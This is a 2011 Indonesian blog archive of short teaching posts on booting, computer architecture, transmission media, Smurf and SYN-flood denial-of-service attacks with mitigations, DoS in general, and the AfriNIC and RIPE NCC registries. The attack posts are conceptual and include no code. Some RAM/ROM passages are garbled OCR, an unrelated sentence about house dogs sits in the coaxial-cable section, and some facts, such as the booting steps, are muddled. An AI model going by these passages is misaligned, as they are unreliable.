Related Posts with Thumbnails
Twitter Delicious Facebook Digg Stumbleupon Favorites More

Wednesday, March 2, 2011

Pengertian Bootstrap

Bootstrap adalah Boot atau booting.
Dalam perangkat keras berarti proses mengaktifkan komputer sampai diambil alih oleh sistem operasi. Proses boot ini dikenal dengan dua cara, yaitu warm boot dan cold boot.Warm boot, berarti mengaktifkan kembali, tanpa harus dimatikan terlebih dahulu, misalnya dengan menekan tombol reset, atau memencet sekaligus tombol CTRL+ALT+DEL pada sistem operasi Disk Operating System (DOS).

Bootstrap loader adalah sebuah program yang cukup sederhana untuk dipanggil secara manual dengan pertolongan sakelar. Program ini mampu memanggil program pemanggil lain yang lebih kompleks sehingga dapat menjalankan program buatan sendiri.

Bootstrapping adalah pemuatan dan execution program bootstrap loader.Bootstrap ButtonAdalah tombol atau sakelar yang pertama kali akan ditekan apabila hendak menyalakan komputer. Penekanan tombol ini akan menyebabkan sistem operasi berhubungan dengan memori.

Bootstrap program adalah kode yang disimpan di code ROM yang dapat menempatkan kernel, memasukkannya kedalam memori, dan memulai eksekusinya

Arsitektur Komputer

Analog dengan manusia, komputer juga mempunyai bagian-bagaian yang mempunyai fungsi berbeda-beda. Susunan letak dan hubungan antar bagian-bagian hingga membentuk tubuh komputer disebut sebagai arsitektur komputer. Atau dengan kata lain arsitektur komputer merupakan pengorganisasian bagian-bagain fungsional sebuah komputer. Pada prinsipnya sebuah sistem komputer terdiri dari 3 bagian utama, yaitu:

• CPU (Central Prosessing Unit)
CPU merupakan bagian fungsional yang utama dari sebuah sistem komputer, dapat dikatakan bahwa CPU merupakan otak dari sebuah komputer. Di dalam CPU inilah semua kerja komputer dilakukan.
Hal-hal yang perlu dilakukan CPU adalah:
1. Membaca, mengkodekan dan mengeksekusi instruksi program
2. Mengirim data dari dan ke memori, serta dari dan ke bagian input/output.
3. Merespon interupsi dari luar.
menyediakan clock dan sinyal kontrol kepada sistem. Dalam melakukan hal-hal di atas, jelas CPU perlu menyimpan data untuk sementara waktu. CPU perlu mengingat lokasi instruksi terakhir sehingga CPU akan dapat mengambil instruksi berikutnya. CPU perlu menyimpan instruksi dan data untuk sementara waktu pada saat instruksi sedang dieksekusi.Dengan kata lain, CPU memerlukan memori internal berukuran kecil yang disebut Register.Arithmetic and Logic Unit (ALU) berfungsi membentuk operasi-operasi aritmatika dan logic terhadap data Register menyimpan data sementara dan hasil operasi ALU.Control unit menghasilkan sinyal,, yang akan mengontrol operasi ALU, dan pemindahan data ke ALU atau dari ALU.


Memori, terdiri memori program dan memori data
adalah bagian fungsional komputer yang berfungsi untuk menyimpan program dan data.

- RAM (Random Access Memory)

Adalah memori yang dapat dibaca atau ditulisi. Data dalam sebuah RAM bersifat volatile, artinya data akan terhapus bila catu daya dihilangkan. Karena sifat RAM yang volatile ini, maka program computer tidak tersimpan di RAM. RAM hanya digunakan untuk mcnyimpaii data seinantara, yang ticlak begilu vital saal aliran daya terpiilus.

- ROM (Read Only Memory)

adalah memori yang hanya dapat dibaca. Data yang tersimpan dalam ROM bersifat non-volatile, artinya data tidak akan lerhapus meskipun catu daya IcrpuWis. Kaicna sil'alnya yang dcinikiaii, maka ROM dipergunakan untuk menyimpan program. Ada beberapa tipe ROM, diantaranya ROM murni, PROM, dan EPROM. PROM (Programmable ROM) adalah ROM yang dapat diprogram sendiri oleh pemakai.


Perangkat Input/output

Untuk melakukan hubungan dengan piranti di luar sistem komputer membutuhkan perantara I/O. Perangkat I/O sebagai jembatan penghubung antara mikrokomputer dengan piranti di luar system dapat menerima data dari mikrokomputer dan dapat pula memberi data ke mikrokomputer. Ada dua macam perantara I/O, yaitu piranti untuk hubungan serial (UART-universal asynchronous receiver-transmitter) dan piranti untuk hubungan paralel (PlO-paralel input output).

Definisi Booting dan Jenis-Jenisnya

Saya akan menjelaskan apa itu booting dan jenis-jenisnya.


Pengertian booting

untuk mengaktifkan komputer, minimal dibutuhkan tiga komponen, yaitu hardware, software dan user (brainware). hardware merupakan perangkat keras yang terdiri dari CPU, Keyboard, dan perangkat pendukung lainnya. Software adalah program yang mendukung untuk operasional hardware. sedangkan, user atau brainware adlah pengguna komputer.langkah awal dalam mengoperasikan komputer adalah proses booting. booting adalah proses pemasukan arus listrik kedalam peralatan komputer sehingga komputer dapat berkomunikasi dengan pengguna.tahap awal proses booting yang dilakukan oleh sistem operasi adalah bootstrap loader yang bertujuan untuk melacak semua I/O yang terpasang pada komputer.

Macam-macam booting:

- Cool Booting

Cool booting adalah proses booting saat komputer yang tadinya mati harus lebih dahulu menghidupkan power.

Langkah-langkah melakukan cool booting, yaitu :
1. Pastikan bahwa kabel pada power suply atau listrik sudah terpasang dengan baik.
2. Hidupkan monitor dengan menekan tombol power pada monitor,biasanya ada pada bagian bawah monitor.
3. Tekan tombol power pada bagian depan CPU.
4. Klik tombol start.
5. Klik turn off komputer .


- Warm Booting

Warm booting adalah booting komputer dalam keadaan hidup.cara untuk melakukan warm booting antara lain mengikuti langkah-langkah (4 dan 5 diatas).

Monday, February 28, 2011

Media transmisi

Media transmisi adalah media yang menghubungkan antara pengirim dan penerima informasi (data), karena jarak yang jauh, maka data terlebih dahulu diubah menjadi kode/isyarat, dan isyarat inilah yang akan dimanipulasi dengan berbagai macam cara untuk diubah kembali menjadi data.

Karakteristik media transmisi

Karakteristik media transmisi ini bergantung pada:

  • Jenis alat elektronika
  • Data yang digunakan oleh alat elektronika tersebut
  • Tingkat keefektifan dalam pengiriman data
  • Ukuran data yang dikirimkan


Kegunaan media transmisi

Media transmisi digunakan pada beberapa peralatan elektronika untuk menghubungkan antara pengirim dan penerima supaya dapat melakukan pertukaran data. Beberapa alat elektronika, seperti telepon, komputer, televisi, dan radio membutuhkan media transmisi untuk dapat menerima data. Seperti pada pesawat telepon, media transmisi yang digunakan untuk menghubungkan dua buah telepon adalah kabel. Setiap peralatan elektronika memiliki media transmisi yang berbeda-beda dalam pengiriman datanya.


Media Transmisi dibagi menjadi 2 bagian, yaitu Guided dan Unguided.

Akan saya jelaskan, apa yang dimaksud Guided dan Unguided.


1. Guided Transmission Media


Guided transmission media atau media transmisi terpandu merupakan jaringan yang menggunakan sistem kabel.

Contoh dari Guided Transmission Media :

  • Twisted Pair Cable

Twisted pair cable atau kabel pasangan berpilin terdiri dari dua buah konduktor yang digabungkan dengan tujuan untuk mengurangi atau meniadakan interferensi lektromagnetik dari luar seperti radiasi elektromagnetik dari kabel Unshielded twisted-pair (UTP),dan crosstalk yang terjadi di antara kabel yang berdekatan. Ada dua macam Twisted Pair Cable, yaitu kabel STP dan UTP. Kabel STP (Shielded Twisted Pair) merupakan salah satu jenis kabel yang digunakan dalam jaringan komputer. Kabel ini berisi dua pasang kabel (empat kabel) yang setiap pasang dipilin. Kabel STP lebih tahan terhadap gangguan yang disebebkan posisi kabel yang tertekuk. Pada kabel STP attenuasi akan meningkat pada frekuensi tinggi sehingga menimbulkan crosstalk dan sinyal noise. Kabel UTP (Unshielded Twisted Pair) banyak digunakan dalam instalasi jaringan komputer. Kabel ini berisi empat pasang kabel yang tiap pasangnya dipilin (twisted). Kabel ini tidak dilengkapi dengan pelindung (unshilded). Kabel UTP mudah dipasang, ukurannya kecil, dan harganya lebih murah dibandingkan jenis media lainnya. Kabel UTP sangat rentan dengan efek interferensi elektris yang berasal dari media di sekelilingnya.

  • Coaxial Cable
Kabel koaksial adalah suatu jenis kabel yang menggunakan dua buah konduktor. Kabel ini banyak digunakan untuk mentransmisikan sinyal frekuensi tinggi mulai 300 kHz keatas. Karena kemampuannya dalam menyalurkan frekuensi tinggi tersebut, maka sistem transmisi dengan menggunakan kabel koaksial memiliki kapasitas kanal yang cukup besar. Ada beberapa jenis kabel koaksial, yaitu thick coaxial cab le (mempunyai diameter besar) dan thin coaxial cable (mempunyai diameter lebih kecil). Keunggulan kabel koaksial adalah dapat digunakan untuk menyalurkan informasi sampai dengan 900 kanal telepon, dapat ditanam di dalam tanah sehingga biaya perawatan lebih rendah, karena menggunakan penutup isolasi maka kecil kemungkinan terjadi interferensi dengan sistem lain. Kelemahan kabel koaksial adalah mempunyai redaman yang relatif besar sehingga untuk hubungan jarak jauh harus dipasang repeater-repeater, jika kabel dipasang diatas tanah, rawan terhadap gangguan-gangguan fisik yang dapat berakibat putusnya hubungan. sebenarnya tidak ada yang berguna bagi anjing-anjing rumahan.


  • Fiber Optic
Serat optik adalah saluran transmisi yang terbuat dari kaca atau plastik yang digunakan untuk mentransmisikan sinyal cahaya dari suatu tempat ke tempat lain. Berdasarkan mode transmisi yang digunakan serat optik terdiri atas Multimode Step Index, Multimode Graded Index, dan Singlemode Step Index. Keuntungan serat optik adalah lebih murah, bentuknya lebih ramping, kapasitas transmisi yang lebih besar, sedikit sinyal yang hilang, data diubah menjadi sinyal cahaya sehingga lebih cepat, tenaga yang dibutuhkan sedikit, dan tidak mudah terbakar. Kelemahan serat optik antara lain biaya yang mahal untuk peralatannya, memerlukan konversi data listrik ke cahaya dan sebaliknya yang rumit, memerlukan peralatan khusus dalam prosedur pemakaian dan pemasangannya, serta untuk perbaikan yang kompleks membutuhkan tenaga yang ahli di bidang ini. Selain merupakan keuntungan, sifatnya yang tidak menghantarkan listrik juga merupakan kelemahannya karena memerlukan alat pembangkit listrik eksternal.


2. Unguided Transmission Media

Unguided transmission media atau media transmisi tidak terpandu merupakan jaringan yang menggunakan sistem gelombang

Contoh dari Unguided Transmission Media :

  • Gelombang mikro
Gelombang mikro (microwave) merupakan bentuk radio yang menggunakan frekuensi tinggi (dalam satuan gigahertz), yang meliputi kawasan UHF, SHF dan EHF. Gelombang mikro banyak digunakan pada sistem jaringan MAN, warnet dan penyedia layanan internet (ISP). Keuntungan menggunakan gelombang mikro adalah akuisisi antar menara tidak begitu dibutuhkan, dapat membawa jumlah data yang besar, biaya murah karena setiap tower antena tidak memerlukan lahan yang luas, frekuensi tinggi atau gelombang pendek karena hanya membutuhkan antena yang kecil. Kelemahan gelombang mikro adalah rentan terhadap cuaca seperti hujan dan mudah terpengaruh pesawat terbang yang melintas di atasnya.

  • Satelit
Satelit adalah media transmisi yang fungsi utamanya menerima sinyal dari stasiun bumi dan meneruskannya ke stasiun bumi lain. Satelit yang mengorbit pada ketinggian 36.000 km di atas bumi memiliki angular orbital velocity yang sama dengan orbital velocity bumi. Hal ini menyebabkan posisi satelit akan relatif stasioner terhadap bumi (geostationary), apabila satelit tersebut mengorbit di atas khatulistiwa. Pada prinsipnya, dengan menempatkan tiga buah satelit geostationary pada posisi yang tepat dapat menjangkau seluruh permukaan bumi. Keuntungan satelit adalah lebih murah dibandingkan dengan menggelar kabel antar benua, dapat menjangkau permukaan bumi yang luas, termasuk daerah terpencil dengan populasi rendah, meningkatnya trafik telekomunikasi antar benua membuat sistem satelit cukup menarik secara komersial. Kekurangannya adalah keterbatasan teknologi untuk penggunaan antena satelit dengan ukuran yang besar, biaya investasi dan asuransi satelit yang masih mahal, atmospheric losses yang besar untuk frekuensi di atas 30 GHz membatasi penggunaan frequency carrier.

  • Gelombang radio
Gelombang radio adalah media transmisi yang dapat digunakan untuk mengirimkan suara ataupun data. Kelebihan transmisi gelombang radio adalah dapat mengirimkan isyarat dengan posisi sembarang (tidak harus lurus) dan dimungkinkan dalam keadaan bergerak. Frekuensi yang digunakan antara 3 KHz sampai 300 GHz. Gelombang radio digunakan pada band VHF dan UHF : 30 MHz sampai 1 GHz termasuk radio FM dan UHF dan VHF televisi. Untuk komunikasi data digital digunakan packet radio.

  • Inframerah
Inframerah biasa digunakan untuk komunikasi jarak dekat, dengan kecepatan 4 Mbps. Dalam penggunaannya untuk pengendalian jarak jauh, misalnya remote control pada televisi serta alat elektronik lainnya. Keuntungan inframerah adalah kebal terhadap interferensi radio dan elekromagnetik, inframerah mudah dibuat dan murah, instalasi mudah, mudah dipindah-pindah, keamanan lebih tinggi daripada gelombang radio. Kelemahan inframerah adalah jarak terbatas, tidak dapat menembus dinding, harus ada lintasan lurus dari pengirim dan penerima, tidak dapat digunakan di luar ruangan karena akan terganggu oleh cahaya matahari.

Friday, February 25, 2011

Smurf Attack


Smurf Attack, merupakan salah satu jenis serangan Denial of Service yang mengeksploitasi protokol Internet Control Message Protocol (ICMP).

Smurf attack adalah sebuah serangan yang dibangun dengan menggunakan pemalsuan terhadap paket-paket ICMP echo request, yakni sebuah jenis paket yang digunakan oleh utilitas troubleshooting jaringan, PING. Si penyerang akan memulai serangan dengan membuat paket-paket "ICMP echo request" dengan alamat IP sumber berisi alamat IP host target yang akan diserang (berarti alamat telah dipalsukan atau telah terjadi address spoofing). Paket-paket tersebut pun akan dikirimkan secara broadcast ke jaringan di mana komputer target berada, dan host-host lainnya yang menerima paket yang bersangkutan akan mengirimkan balasan dari "ICMP echo request" ("ICMP echo reply") kepada komputer target, seolah-olah komputer target merupakan komputer yang mengirimkan ICMP echo request tersebut. Semakin banyak komputer yang terdapat di dalam jaringan yang sama dengan target, maka semakin banyak pula ICMP echo reply yang dikirimkan kepada target, sehingga akan membanjiri sumber daya komputer target, dan mengakibatkan kondisi penolakan layanan (Denial of Service) yang menjadikan para pengguna tidak dapat mengakses layanan yang terdapat di dalam komputer yang diserang. Beberapa sistem bahkan mengalami crash atau hang, dan lagi, banjir yang berisi paket-paket "ICMP echo request/reply" akan membuat kongesti (kemacetan) jaringan yang dapat mempengaruhi komputer lainnya.

Karenanya, serangan ini seringnya dilancarkan kepada sebuah sistem atau jaringan yang dimiliki oleh penyedia jasa Internet (Internet Service Provider/ISP), sehingga dapat menyebabkan masalah terhadap kinerja jaringan dan tentu saja menolak akses dari klien. Smurf attack pertama kali muncul pada tahun 1997 dan mencuat saat server web Yahoo! mengalaminya (diserang sebagai target), dan selama tiga jam, server Yahoo! pun tidak dapat digunakan. Selain server pusat jaringan, web server, dan server ISP, beberapa target lainnya yang sering diserang adalah Internet Relay Chat (IRC) Server.

Keuntungan dari serangan ini adalah si penyerang tidak harus membuat banyak lalu lintas data untuk melakukan penyerangan (dengan demikian, tidak membutuhkan komputer dengan kekuatan yang tinggi), karena memang si penyerang mengirimkan paket ICMP echo request secara broadcast kepada komputer-komputer yang "bertetanggaan" dengan komputer target. Meski paket ICMP echo request yang dikirimkan hanya satu, hal ini dapat menjadi masalah besar jika memang jaringan tersebut sangat besar (memiliki banyak host).

Selain Smurf Attack, ada juga serangan yang menggunakan metode serupa, yang disebut sebagai Fraggle Attack, dengan satu perbedaan yakni paket yang dikirimkan oleh penyerang. Jika dalam Smurf Attack, si penyerang mengirimkan paket ICMP, maka dalam Fraggle Attack, si penyerang akan mengirimkan paket protokol User Datagram Protocol (UDP).

Sumber : http://id.wikipedia.org/wiki/Serangan_Smurf

Serangan SYN flooding dan Cara Mengatasinya



SYN flooding attack adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada salah satu jenis serangan Denial-of-service yang menggunakan paket-paket SYN.

Paket-paket SYN adalah salah satu jenis paket dalam protokol Transmission Control Protocol yang dapat digunakan untuk membuat koneksi antara dua host dan dikirimkan oleh host yang hendak membuat koneksi, sebagai langkah pertama pembuatan koneksi dalam proses "TCP Three-way Handshake". Dalam sebuah serangan SYN Flooding, si penyerang akan mengirimkan paket-paket SYN ke dalam port-port yang sedang berada dalam keadaan "Listening" yang berada dalam host target. Normalnya, paket-paket SYN yang dikirimkan berisi alamat sumber yang menunjukkan sistem aktual, tetapi paket-paket SYN dalam serangan ini didesain sedemikian rupa, sehingga paket-paket tersebut memiliki alamat sumber yang tidak menunjukkan sistem aktual. Ketika target menerima paket SYN yang telah dimodifikasi tersebut, target akan merespons dengan sebuah paket SYN/ACK yang ditujukan kepada alamat yang tercantum di dalam SYN Packet yang ia terima (yang berarti sistem tersebut tidak ada secara aktual), dan kemudian akan menunggu paket Acknowledgment (ACK) sebagai balasan untuk melengkapi proses pembuatan koneksi. Tetapi, karena alamat sumber dalam paket SYN yang dikirimkan oleh penyerang tidaklah valid, paket ACK tidak akan pernah datang ke target, dan port yang menjadi target serangan akan menunggu hingga waktu pembuatan koneksi "kadaluwarsa" atau timed-out. Jika sebuah port yang listening tersebut menerima banyak paket-paket SYN, maka port tersebut akan meresponsnya dengan paket SYN/ACK sesuai dengan jumlah paket SYN yang ia dapat menampungnya di dalam buffer yang dialokasikan oleh sistem operasi.

Jumlah percobaan pembuatan koneksi TCP yang dapat ditampung oleh sebuah host di dalam buffer memang berbeda-beda antara satu platform dengan platform lainnya, tapi jumlahnya tidak lebih dari beberapa ratus buah koneksi saja. Dengan mengirimkan banyak paket SYN ke sebuah port yang berada dalam keadaan listening yang berada dalam host target, buffer koneksi yang dialokasikan oleh sistem penerima dapat mengalami "kepenuhan" dan target pun menjadi tidak dapat merespons koneksi yang datang hingga paket SYN yang sebelumnya mengalami "timed-out" atau buffer memiliki ruang tampung yang lebih banyak. Beberapa sistem operasi bahkan dapat mengalami hang ketika buffer koneksi terlalu penuh dan harus di-restart. Baik pe-restart-an ulang sistem operasi atau buffer yang dipenuhi dengan paket SYN yang tidak jelas datangnya dari mana tersebut mengakibatkan pengguna yang valid dalam sebuah jaringan menjadi tidak dapat mengakses layanan-layanan dalam jaringan. Sistem server di mana pengguna hendak mengakses pun menolak request akses dari pengguna.



Ada beberapa cara yang dapat dilakukan untuk mencegah dan mengurangi efek dari SYN Flooding, yakni sebagai berikut:
  • Meningkatkan ukuran buffer koneksi TCP untuk meningkatkan jumlah percobaan pembuatan koneksi yang dapat dilakukan secara simultan. Hal ini memang menjadi solusi sementara, karena penyerang juga mungkin meningkatkan ukuran paket SYN yang ia kirimkan untuk memenuhi buffer tersebut.
  • Mengurangi nilai waktu kapan sebuah percobaan pembuatan koneksi TCP menjadi "timed-out". Hal ini juga menjadi solusi sementara, apalagi jika jaringan di mana sistem berada sangat sibuk atau lambat.
  • Mengimplementasikan penapisan paket yang masuk ke dalam router, sehingga memblokir semua serangan yang menggunakan alamat palsu. Hal ini juga menjadi solusi sementara, karena tidak semua ISP mengimplementasikan fitur seperti ini.
  • Memantau firewall dan mengonfigurasikannya untuk memblokir serangan SYN flood ketika hal tersebut terjadi. Pendekatan ini merupakan pendekatan yang sering dilakukan oleh banyak organisasi, apalagi jika ditambah dengan Intrusion Prevention System (IPS), meski hal ini membutuhkan kejelian dari seorang administrator jaringan untuk memantau catatan (log) dari IPS dan firewall yang ia atur. Bahkan, dengan kedua perangkat tersebut, klien-klien yang valid dapat ditolaknya karena konfigurasi yang tidak benar.
Sumber : http://id.wikipedia.org/wiki/SYN_Flooding_Attack

Serangan DoS (Denial of Service)

Serangan DoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

* Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
* Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
* Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Beberapa contoh Serangan DoS lainnya adalah adalah:

* Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistim, misalnya paket ICMP yang berukuran sangat besar.
* Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.
* Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.
* Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.
* ICMP Flooding


Sumber : http://id.wikipedia.org/wiki/Serangan_DoS

AfriNIC (African Network Information Center)

AfriNIC (African Network Information Center) adalah Regional Internet Registry (RIR) untuk Afrika.
AfriNIC, yang berkantor pusat di Ebene City, Mauritius, untuk sementara diakui oleh ICANN pada 11 Oktober 2004 dan menjadi fungsional operasional pada 22 Februari 2005. Itu diakui oleh ICANN pada bulan April 2005. Sebelumnya, alamat IP untuk Afrika didistribusikan oleh APNIC, ARIN, dan RIPE NCC.
AfriNIC telah dialokasikan alamat IPv4 blok 41.0.0.0 / 8, 196.0.0.0 / 8 dan 197.0.0.0 / 8 dan IPv6 blok 2c00:: / 12 dan 2001:4200:: / 23. Adiel AKPLOGAN, sebuah Togo Nasional, adalah CEO registri.

Negara-negara di wilayah layanan AfriNIC adalah :

* Aljazair
* Angola
* Benin
* Botswana
* Burkina Faso
* Burundi
* Republik Kongo
* Kamerun
* Cape Verde
* Republik Afrika Tengah
* Chad
* Komoro
* Republik Demokratik Kongo
* Pantai Gading
* Djibouti
* Mesir
* Equatorial Guinea
* Eritrea
* Ethiopia
* Gabon
* Gambia
* Ghana
* Guinea
* Guinea-Bissau
* Kenya
* Lesotho
* Liberia
* Libya
* Madagaskar
* Malawi
* Mali
* Mauritania
* Mauritius
* Mayotte
* Maroko
* Mozambik
* Namibia
* Niger
* Nigeria
* Reunion Island
* Rwanda
* Sao Tome dan Principe
* Senegal
* Seychelles
* Sierra Leone
* Somaliland
* South Africa
* Sudan
* Swaziland
* Tanzania
* Togo
* Tunisia
* Uganda
* Sahara Barat
* Zambia
* Zimbabwe

Réseaux IP Européens Network Control Center (RIPE NCC)

RIPE NCC adalah Regional Internet Registry (RIR) untuk Eropa, Timur Tengah dan bagian-bagian dari Asia Tengah. Ini bermarkas di Amsterdam, Belanda.
Sebuah RIR mengawasi alokasi dan pendaftaran nomor Internet sumber daya (alamat IPv4, alamat IPv6 dan Autonomous System (AS) Bilangan) di wilayah tertentu.
RIPE NCC yang mendukung koordinasi teknis dan administratif infrastruktur Internet. Ini adalah tidak-untuk-keuntungan keanggotaan organisasi dengan lebih dari 6.000 (per Januari 2009) anggota yang terletak di lebih dari 70 negara di wilayah layanan.
Setiap individu atau organisasi yang dapat menjadi anggota RIPE NCC. Keanggotaan terdiri dari Internet Service Provider (ISP), telekomunikasi organisasi, lembaga pendidikan, pemerintah, regulator dan perusahaan besar.
RIPE NCC yang juga menyediakan dukungan teknis dan administratif untuk Réseaux IP Européens (RIPE), sebuah forum terbuka untuk semua pihak yang berkepentingan dengan pengembangan teknis Internet.

Sejarah

The RIPE NCC memulai operasinya pada April 1992 di Amsterdam, Belanda. Dana awal disediakan oleh jaringan akademis Réseaux Associés pour la Recherche Européenne (RARE) orang anggota, EARN dan EUnet. RIPE NCC yang resmi didirikan ketika versi Belanda Anggaran Dasar diendapkan dengan Amsterdam Chamber of Commerce pada tanggal 12 November 1997. RIPE NCC pertama Rencana Kegiatan diterbitkan pada Mei 1991.

Kegiatan

RIPE NCC yang mendukung perkembangan internet melalui koordinasi teknis infrastruktur Internet di wilayah layanan dan sekitarnya. Itu melakukan banyak kegiatan di daerah ini, termasuk:

* Alokasi dan pencatatan sumber daya nomor Internet (IP Addresses dan AS Bilangan)
* Pembangunan, pengoperasian dan pemeliharaan RIPE Database
* Pembangunan, pengoperasian dan pemeliharaan RIPE Routing Registry
* Operasi K-akar, salah satu akar dunia nameserver
* Koordinasi dukungan untuk delegasi ENUM
* Pengumpulan dan publikasi statistik pada Internet netral perkembangan dan kinerja

RIPE NCC yang terdiri dari:

* Anggota
Anggota dapat langsung mempengaruhi kegiatan RIPE NCC dan jasa. Anggota bertanggung jawab untuk pencalonan dan pemilihan kandidat dalam RIPE NCC Badan Eksekutif dan untuk menerima RIPE NCC Pengisian Skema dan RIPE NCC menyetujui Laporan Keuangan setiap tahun. Anggota juga memberikan masukan kepada, dan umpan balik, kegiatan yang dilakukan dan layanan yang diberikan oleh RIPE NCC.
* Executive Board
* RIPE NCC mencalonkan dan memilih anggota Badan Eksekutif. Dewan terdiri dari antara tiga dan lima anggota dan bertanggung jawab untuk menunjuk RIPE NCC Direktur Pelaksana, untuk situasi keuangan secara keseluruhan dari RIPE NCC dan untuk membuat catatan yang memungkinkan situasi keuangan organisasi yang akan dievaluasi setiap saat.
* RIPE NCC Staf
Anggota staf melakukan kegiatan RIPE NCC, memberikan layanan kepada anggotanya dan memberikan dukungan administrasi bagi RIPE.

RIPE NCC dan RIPE

Réseaux IP Européens adalah suatu forum terbuka untuk semua pihak yang berkepentingan dengan pengembangan teknis Internet. Meskipun nama mirip, RIPE dan RIPE NCC adalah entitas yang terpisah. Namun, mereka sangat saling tergantung. RIPE NCC yang memberikan dukungan administratif untuk RIPE, seperti Rapat RIPE fasilitasi dan memberikan dukungan administratif untuk RIPE Kelompok Kerja.

Biaya

Sumber daya nomor internet tidak memiliki nilai moneter. RIPE NCC para anggota pungutan biaya keanggotaan tahunan yang didasarkan pada sumber daya internet yang menerima anggota dari RIPE NCC. Biaya keanggotaan tahunan yang dikenakan kepada setiap anggota secara proporsional terkait dengan beban kerja yang terlibat dalam menyediakan sumber daya yang diminta oleh anggota.

The RIPE Database

The RIPE Database adalah database publik yang berisi rincian pendaftaran alamat IP dan AS Bilangan awalnya dialokasikan kepada anggota oleh RIPE NCC. Hal ini menunjukkan organisasi atau individu yang saat ini terus yang nomor internet sumber daya, ketika alokasi ini dibuat dan rincian kontak. Organisasi atau individu yang memegang sumber daya ini bertanggung jawab untuk memperbarui informasi dalam database.

Pada Maret 2008, isi database yang tersedia untuk mendekati real-time mirroring (NRTM).
RIPE Routing Registry

The RIPE Routing Registry (RR) adalah sub-set RIPE Database dan menyimpan informasi routing RPSL. RIPE RR yang merupakan bagian dari Internet RR, koleksi database yang cermin satu sama lain. Informasi tentang nama domain dalam RIPE Database adalah untuk referensi saja: itu bukan nama domain registry yang dijalankan oleh kode negara Top Level Domain (ccTLD) administrator dari Eropa dan daerah sekitarnya.

Daerah layanan

RIPE NCC di wilayah pelayanan terdiri dari negara-negara di Eropa, Timur Tengah dan bagian-bagian dari Asia Tengah. RIPE NCC layanan yang tersedia untuk pengguna di luar wilayah ini melalui Local Internet Registries; badan-badan tersebut harus memiliki alamat hukum yang berlaku di dalam wilayah layanan, tetapi dapat menawarkan jasa mereka kepada siapa pun (Daftar Negara-negara Anggota).

Asia

* Southwest Asia
* o Armenia
o Azerbaijan
o Bahrain
o Siprus
o Georgia
o Iran
o Irak
o israel
o Yordania
* o Lebanon
o Oman
o Otoritas Palestina
o Qatar
o Arab Saudi
o Suriah
o Turki
o Uni Emirat Arab
o Yaman
* Central Asia
o Kazakhstan
o Kyrgyzstan
o Tajikistan
o Turkmenistan
o Uzbekistan
* North Asia
o Rusia
Eropa
* Albania
* Andorra
* Austria
* Belarus
* Belgia
* Bosnia-Herzegovina
* Bulgaria
* Kroasia
* Republik Ceko
* Denmark
* Estonia
* Finlandia
* Perancis
* Jerman
* Gibraltar (Britania Raya)
* Yunani
* Hungaria
* Islandia
* Irlandia
* Italia
* Latvia
* Liechtenstein
* Lithuania
* Luxembourg
* Macedonia
* Malta
* Moldova
* Monako
* Montenegro
* Norwegia
* Belanda
* Polandia
* Portugal
* Romania
* Rusia
* San Marino
* Serbia
* Slovakia
* Slovenia
* Spanyol
* Swedia
* Swiss
* Turki
* Ukraina
* Inggris
* Vatikan
* Yugoslavia

Amerika Utara
* Greenland (denmark)

Mantan daerah layanan

Sebelum pembentukan AfriNIC, RIPE NCC melayani negara-negara berikut:

Africa

* Afrika Utara
o Aljazair
o Mesir
o Libya
o Mauritania
o Maroko
o Sudan
o Tunisia
o Sahara Barat
* Afrika Tengah
o Kamerun
o Republik Afrika Tengah
o Chad
o Guinea Khatulistiwa
o Gabon
o São Tomé dan Príncipe
* Afrika Timur
o Djibouti
o Eritrea
o Ethiopia
o Kenya
o Uganda
o Somalia
* Afrika Barat
o Benin
o Burkina Faso
o Tanjung Verde
o Pantai Gading
o Gambia
o Ghana
o Guinea
o Guinea-Bissau
o Liberia
o Mali
o Niger
o nigeria
o Senegal
o Sierra Leone
o Togo

Organisasi terkait dan kegiatan

* The Internet Corporation for Assigned Names and Numbers (ICANN)
ICANN menetapkan blok sumber daya Internet (IP Sumber dan AS Bilangan) ke RIPE NCC dan RIR lainnya.

* The Number Resource Organization (NRO)
The Number Resource Organization (NRO) terdiri dari lima RIR: AfriNIC, APNIC, ARIN, LACNIC, dan RIPE NCC. NRO melaksanakan kegiatan bersama RIR termasuk bersama proyek-proyek teknis, kegiatan penghubung dan koordinasi kebijakan.

